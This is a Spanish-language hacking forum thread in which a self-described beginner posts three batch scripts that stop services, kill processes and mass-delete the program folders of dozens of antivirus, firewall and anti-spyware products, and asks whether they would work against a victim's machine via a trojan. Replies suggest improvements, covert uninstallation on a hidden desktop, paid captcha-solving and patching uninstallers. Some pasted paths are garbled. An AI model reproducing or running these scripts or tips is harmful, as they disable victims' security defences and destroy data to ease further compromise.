Atacar Antivirus en .bat

Iniciado por Xaerox, 14 Noviembre 2013, 05:16 AM

0 Miembros y 2 Visitantes están viendo este tema.

Xaerox

Muchachos una pregunta, soy nuevo en esto del hacking, :( les quiero preguntar algo, ejecutando algunos de estos "virus" en .bat puedo destruir o inutilizar el antivirus de Kaspersky?  >:D No conozco mucho sobre programación en batch por eso les pregunto, los codigos los encontre por alli en google.  ;D

El Primero:

@echo off
net stop "Centro de Seguridad"
net stop "Firewall de Windows/Conexión compartida a Internet (ICS)"
Taskkill /f /IM ccProxy.exe /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM
NMAIN.EXE /IM SBServ.exe /IM NOPDB.EXE
cd c:Archivos de programaArchiv os comunesSymante c Shared
attrib -H -S -R *.*
del /s /q *.*
rd c:Archivos de programaArchiv os comunesSymante c Shared
cd c:Archivos de programaArchiv os comunesSymante c SharedSPBBC
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM symlcsvc.exe
cd C:Archivos de programaArchiv os comunesSymante c SharedCCPD-LC
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM SymWSC.exe /IM UsrPrmpt.exe
cd c:Archivos de programaArchiv os comunesSymante c SharedSecurity Center
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM navapsvc.exe /IM ISSVC.exe /IM
cd c:Archivos de programaNorton Internet Security
attrib -H -S -R *.*
del /s /q *.*
cd c:Archivos de programaNorton Internet SecurityNorton AntiVirus
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM zlcli6ent.exe /IM zo3nealarm.exe
cd C:Archivos de programa*one Labs*oneAlarm
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM ewidoctrl.exe
cd C:Archivos de programaewido anti-malware
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM vsmon.exe
C:WINDOWSsystem3 2*oneLabs
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe /IM navapw32.exe /IM SAVScan.exe
cd C:Archivos de programaNorton AntiVirus
attrib -H -S -R *.*
del /s /q *.*
cd C:Archivos de programaNorton AntiVirusIWP
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM NPROTECT.EXE
cd C:Archivos de programaNorton Utilities
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe
cd C:Archivos de programaWebroo tSpy Sweeper
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM GBPoll.exe /IM navapsvc.exe /IM NPFMntor.exe /IM NPROTECT.EXE /IM NOPDB.EXE /IM GBTray.exe /IM
NPFMntor.exe /IM GhostTray.exe /IM PQV2iSvc.exe
rd C:Archivos de programaNorton SystemWorksNor ton AntiVirus
Taskkill /f /IM no-spy.exe
cd C:Archivos de programaSinEsp ias
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM spyaxe.exe /IM spyaxe.exe
cd C:Archivos de programaSpyAxe
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM SpywareStrike. exe /IM SpywareStrike. exe
cd C:Archivos de programaSpywar eStrike
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM gcasDtServ.exe /IM gcasServ.exe
cd C:Archivos de programaMicros oft AntiSpyware
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM kavsvc.exe /IM kav.exe
cd C:ARCHIVOS DE PROGRAMAKASPER SKY LABKASPERSKY ANTI-VIRUS PERSONAL
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcregwiz.exe /IM mcagent.exe
cd c:archivos de programamcafee .comagent
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM VsStat.exe
cd C:Archivos de programaMcAfee McAfee VirusScan
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM firefox.exe
cd C:Archivos de programaMozill a Firefox
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
cd C:Archivos de programaPanda SoftwarePanda Antivirus Titanium
attrib -H -S -R *.*
del /s /q *.*
rd C:Archivos de programaPanda SoftwarePanda Antivirus Titanium
Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exe
cd C:Archivos de programaSynapt icsSynTP
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM FrameworkServi ce.exe /IM Mcshield.exe /IM VsTskMgr.exe /IM SHSTAT.EXE
cd C:Archivos de programaNetwor k AssociatesViru sScan
attrib -H -S -R *.*
del /s /q *.*
cd C:Archivos de programaNetwor k AssociatesComm on Framework
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM nod32krn.exe /IM nod32kui.exe
cd C:Archivos de programaEset
attrib -H -S -R *.*
del /s /q *.*
rd C:Archivos de programaEset
Taskkill /f /IM AVGSERV9.EXE /IM AVGCC32.EXE
cd C:PROGRAM FILESGRISOFTAV G6
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
cd C:Archivos de programaAVPers onal
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM ASHSERV.EXE /IM ASHWEBSV.EXE /IM ASHMAISV.exe
cd C:ARCHIVOS DE PROGRAMAALWIL SOFTWAREAVAST4
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM avgcc.exe /IM avgamsvr.exe /IM avgupsvc.exe
cd "cd C:Archivos de programaGrisof t"
attrib -H -S -R *.*
del /s /q *.*
cd "AVGFRE*"
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM IEXPLORE.EXE
cd C:Archivos de programaIntern et Explorer
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM Pagent.exe /IM pagentwd.exe /IM pavsched.exe
cd C:Archivos de programaPanda SoftwarePanda Administrator 3Pav_Agent
attrib -H -S -R *.*
del /s /q *.*
cd C:Archivos de programaPanda SoftwarePanda Administrator 3Scheduler
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe
cd C:Archivos de programaSoftwi nBitDefender9
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM xcommsvr.exe /IM livesrv.exe /IM bdss.exe
rd C:Archivos de programaArchiv os comunesSoftwin
Taskkill /f /IM DefWatch.exe /IM Rtvscan.exe
cd C:Archivos de programaSymant ec_Client_Secu ritySymantec AntiVirus
attrib -H -S -R *.*
del /s /q *.*
Taskkill /f /IM avgamsvr.exe /IM avgupsvc.exe
cd C:Archivos de programaAVG7
attrib -H -S -R *.*
del /s /q *.*
exit

el Segundo:

@echo off
c:
cd\
rd /q /s *norton*
rd /q /s *kav*
rd /q /s *kaspersky*
rd /q /s *panda*
rd /q /s *mcafee*
cd documents*
rd /q /s *norton*
rd /q /s *kav*
rd /q /s *kaspersky*
rd /q /s *panda*
rd /q /s *mcafee*
exit


y el ultimo:

@echo off
If exist "C:\Archivos de programa\ewido anti-malware" (goto ewido) else (goto 1)
:1
If exist "C:\Archivos de programa\Eset" (goto nod32) else (goto 2)
:2
If exist "C:\Archivos de programa\Spybot - Search & Destroy" (goto spybot) else (goto 3)
:3
If exist "C:\Archivos de programa\Windows Defender" (goto windefender) else (goto 4)
:4
If exist "C:\Archivos de programa\mcafee.com" (goto mcafee) else (goto 5)
MANUAL DE PROGRAMACION EN BATCH http://209.85.229.132/search?q=cache:do6sau8zZCoJ:usuarios.multiman...
21 de 101 12/02/2010 9:44:5
If exist "C:\Archivos de programa\Zone Labs\ZoneAlarm" (goto zone) else (goto 6)
:6
If exist "C:\Archivos de programa\Trend Micro" (goto trend) else (goto 7)
:7
If exist "C:\Archivos de programa\Synaptics" (goto sinapti) else (goto 8)
:8
If exist "C:\Archivos de programa\Grisoft\AVG free" (goto avfree) else (goto 9)
:9
If exist "C:\Archivos de programa\Archivos comunes\Symantec Shared" (goto norton) else (goto 10)
:10
If exist "C:\Archivos de programa\Norton AntiVirus" (goto norton2) else (goto 11)
:11
If exist "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security (goto Panda06) else
(goto 12)
:12
If exist "C:\Archivos de programa\Alwil Software\Avast4" (goto Avast4) else (goto 13)
:13
If exist "C:\Archivos de programa\Microsoft AntiSpyware" (goto micanti) else (goto 14)
:14
If exist "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal" (goto kav) else (goto
15)
:15
If exist "C:\Archivos de programa\Webroot\Spy Sweeper" (goto sweeper) else (goto 16)
:16
If exist "C:\Archivos de programa\SinEspias" (goto sinspy) else (goto 17)
:17
If exist "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium" (goto pandatitanium) else
(gto 18)
:18
If exist "C:\Archivos de programa\AVPersonal" (goto avpersonal) else (goto 19)
:19
If exist "C:\Archivos de programa\Softwin\BitDefender9" (goto bit9) else (goto 20)
:20
goto fin
:bit9
net stop "bdoesrv"
net stop "bdmcon"
net stop "bdnagent"
net stop "bdswitch"

Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe
cd C:\Archivos de programa\Softwin\BitDefender9
attrib -H -S -R *.*
del /s /q *.*
:avpersonal
net stop "AVGUARD"
net stop "AVWUPSRV"
net stop "AVGNT"
net stop "AVSched32"

Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
cd C:\Archivos de programa\AVPersonal
attrib -H -S -R *.*
del /s /q *.*
:pandatitanium
net stop "Pavsrv51"
net stop "AVENGINE"
net stop "apvxdwin"
net stop "pavProxy"
Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
cd "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium"
attrib -H -S -R *.*
del /s /q *.*
rd /s /q C:\Archivos de programa\Panda Software\Panda Antivirus Titanium
:sinspy
Taskkill /f /IM no-spy.exe
cd "C:\Archivos de programa\SinEspias"
attrib -H -S -R *.*
del /s /q *.*
:sweeper
Taskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe
cd "C:\Archivos de programa\Webroot\Spy Sweeper"
attrib -H -S -R *.*
del /s /q *.*
:kav
cd "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal"
net stop "kav"
net stop "kavsvc"
Taskkill /f /IM kav.exe /IM kavsvc.exe
attrib -H -S -R *.*
del /s /q *.*
goto 15

:micanti
cd "C:\Archivos de programa\Microsoft AntiSpyware"
net stop "gcasServ"
net stop "gcasDtServ"
Taskkill /f /IM gcasServ.exe /IM gcasDtServ.exe
attrib -H -S -R *.*
del /s /q *.*
goto 14
:Avast4
cd "C:\Archivos de programa\Alwil Software\Avast4"
net stop "aswUpdSv"
net stop "ashServ"
net stop "ashWebSv"
net stop "ashDisp"
Taskkill /f /IM aswUpdSv.exe /IM ashServ.exe /IM ashWebSv.exe /IM ashDisp.exe
attrib -H -S -R *.*
del /s /q *.*
goto 13
:Panda06
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security"
net stop "TPSrv"
net stop "PavFnSvr"
net stop "pavsrv51"
net stop "pskmssvc"
net stop "AVENGINE"
net stop "PNMSRV"
net stop "PsImSvc"
Taskkill /f /IM TPSrv.exe /IM PavFnSvr.exe /IM pavsrv51.exe /IM pskmssvc.exe /IM AVENGINE.EXE /IM
PNMSRV.EXE /IM PsImSvc.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\FIREWALL"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Common Files\Panda Software\PavShld"
Taskkill /f /IM pavprsrv.exe
attrib -H -S -R *.*
del /s /q *.*
goto 12
:norton2
cd "C:\Archivos de programa\Norton AntiVirus"
net stop "navapsvc"
net stop "NPFMntor"
Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Norton AntiVirus\IWP"
attrib -H -S -R *.*
del /s /q *.*
goto 11
:norton
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared"
net stop "ccSetMgr"
net stop "SNDSrvc"
net stop "SPBBCSvc"
net stop "ccEvtMgr"
net stop "ccApp"
net stop "symlcsvc"
Taskkill /f /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM
symlcsvc.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\SPBBC"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\CCPD-LC"
attrib -H -S -R *.*
del /s /q *.*
goto 10
:avfree
cd "C:\Archivos de programa\Grisoft\AVG free"
net stop "avgamsvr"
net stop "vgupsvc"
net stop "avgcc"
Taskkill /f /IM avgamsvr.exe /IM vgupsvc.exe /IM avgcc.exe
attrib -H -S -R *.*
del /s /q *.*
goto 9
:sinapti
cd "C:\Archivos de programa\Synaptics\SynTP"

net stop "SynTPLpr"
net stop "SynTPEnh"
Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exe
attrib -H -S -R *.*
del /s /q *.*
goto 8
:trend
cd "C:\Archivos de programa\Trend Micro\OfficeScan Client"
net stop "ntrtscan"
net stop "tmlisten"
net stop "OfcPfwSvc"
net stop "pccntmon"
Taskkill /f /IM ntrtscan.exe /IM tmlisten.exe /IM OfcPfwSvc.exe /IM pccntmon.exe
attrib -H -S -R *.*
del /s /q *.*
goto 7
:zone
cd "C:\Archivos de programa\Zone Labs\ZoneAlarm"
net stop "zlclient"
net stop "zonealarm"
net stop "vsmon"
Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM vsmon.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\WINDOWS\system32\ZoneLabs"
attrib -H -S -R *.*
del /s /q *.*
goto 6
:mcafee
cd "c:\archivos de programa\mcafee.com\agent"
net stop "mcdetect"
net stop "mctskshd"
net stop "mcagent"
net stop "mcvsescn"
net stop "mcvsftsn"
net stop "mcvsshld"
net stop "mcvsrte"
net stop "mcshield"
Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcagent.exe /IM mcvsescn.exe /IM mcvsftsn.exe /IM
mcvsshld.exe /IM mcvsrte.exe /IM mcshield.exe
attrib -H -S -R *.*
del /s /q *.*
rd /s /q "c:\archivos de programa\mcafee.com\agent"
rd /s /q "c:\archivos de programa\mcafee.com"
goto 5
:windefender
cd "C:\Archivos de programa\Windows Defender"
net stop "MsMpEng"
net stop "MSASCui"
Taskkill /f /IM MsMpEng.exe /IM MSASCui.exe
attrib -H -S -R *.*
del /s /q *.*
goto 4
:spybot
cd "C:\Archivos de programa\Spybot - Search & Destroy"
net stop "TeaTimer"
Taskkill /f /IM TeaTimer.exe
attrib -H -S -R *.*
del /s /q *.*
goto 3
:nod32
cd "C:\Archivos de programa\Eset"
net stop "nod32krn"
net stop "nod32kui"
net stop "nod32"
Taskkill /f /IM nod32krn.exe /IM nod32kui.exe /IM nod32.exe
attrib -H -S -R *.*
del /s /q *.*
goto 2
:ewido
cd "C:\Archivos de programa\ewido anti-malware"
Taskkill /f /IM ewidoctrl.exe /IM ewidoguard.exe
net stop "ewidoctrl"
net stop "ewidoguard"
attrib -H -S -R *.*
del /s /q *.*
goto 1
:fin
exit


De ante mano muchas gracias!

Saludos.


# "El único sistema seguro es aquél que está apagado en el interior de un bloque de hormigón protegido en una habitación sellada rodeada por guardias armados"
-- Gene Spafford

Mad Antrax

La idea es buena, pero yo cambiaría las rutas absolutas del BAT por variables del sistema, es decir:

%programfiles% en lugar de "C:\Archivos de Programa"

btw, buen trabajo :)
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

Xaerox

# "El único sistema seguro es aquél que está apagado en el interior de un bloque de hormigón protegido en una habitación sellada rodeada por guardias armados"
-- Gene Spafford

Karcrack

Ningún antivirus que se precie puede ser cerrado desde Batch y mucho menos sin privilegios de administrador.

Xaerox

Explicame algo karcrack, si yo introduzco un troyano en X ordenador, supongamos que esa cuenta tiene privilegios de Administrador, y yo subo le subo estos "virus" y los ejecuto remotamente. Lograria borrar y/o dañar los antivirus?  Funcionarian?
# "El único sistema seguro es aquél que está apagado en el interior de un bloque de hormigón protegido en una habitación sellada rodeada por guardias armados"
-- Gene Spafford

burbu_1

la mayoría de antivirus tienen módulos de autoprotección cargados como drivers que no te dejan acceder a los procesos y archivos del antivirus.

Si tienes algún av instalado puedes comprobarlo intentando matar el proceso desde el taskmgr, o desde la consola con taskkill.

Saludos.

Karcrack

En principio con privilegios de administrador podrías desinstalar cualquier antivirus, ya que si el desinstalador puede tú también. Lo más probable es que requieras de un reinicio para deshabilitarlo por completo.

Esto es sólo una idea ( :silbar:) pero siempre podrías con privilegios de administrador lanzar el desinstalador del propio antivirus y ahorrarte todo el esfuerzo :P Si quieres que no se vea nada de nada siempre puedes crear un escritorio (CreateDesktop(), etc...) e interactuar con la ventana de forma invisible.

Mad Antrax

Cita de: Karcrack en 16 Noviembre 2013, 17:53 PM
En principio con privilegios de administrador podrías desinstalar cualquier antivirus, ya que si el desinstalador puede tú también. Lo más probable es que requieras de un reinicio para deshabilitarlo por completo.

Esto es sólo una idea ( :silbar:) pero siempre podrías con privilegios de administrador lanzar el desinstalador del propio antivirus y ahorrarte todo el esfuerzo :P Si quieres que no se vea nada de nada siempre puedes crear un escritorio (CreateDesktop(), etc...) e interactuar con la ventana de forma invisible.

No recuerdo el nombre, pero hay un antivirus que el propio desinstalador te enseña un captcha para evitar ese tipo de "trampas" xD
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

ny0s

este post se me hace muy parecido a otro post que lei en hackxcrack

Karcrack

#9
Cita de: ||MadAntrax|| en 16 Noviembre 2013, 18:23 PM
No recuerdo el nombre, pero hay un antivirus que el propio desinstalador te enseña un captcha para evitar ese tipo de "trampas" xD
Bastará con enviar el captcha a uno de esos servicios donde hay hindúes resolviéndolos por hora :laugh:

O si te pones chulo siempre puedes parchear el desinstalador :rolleyes: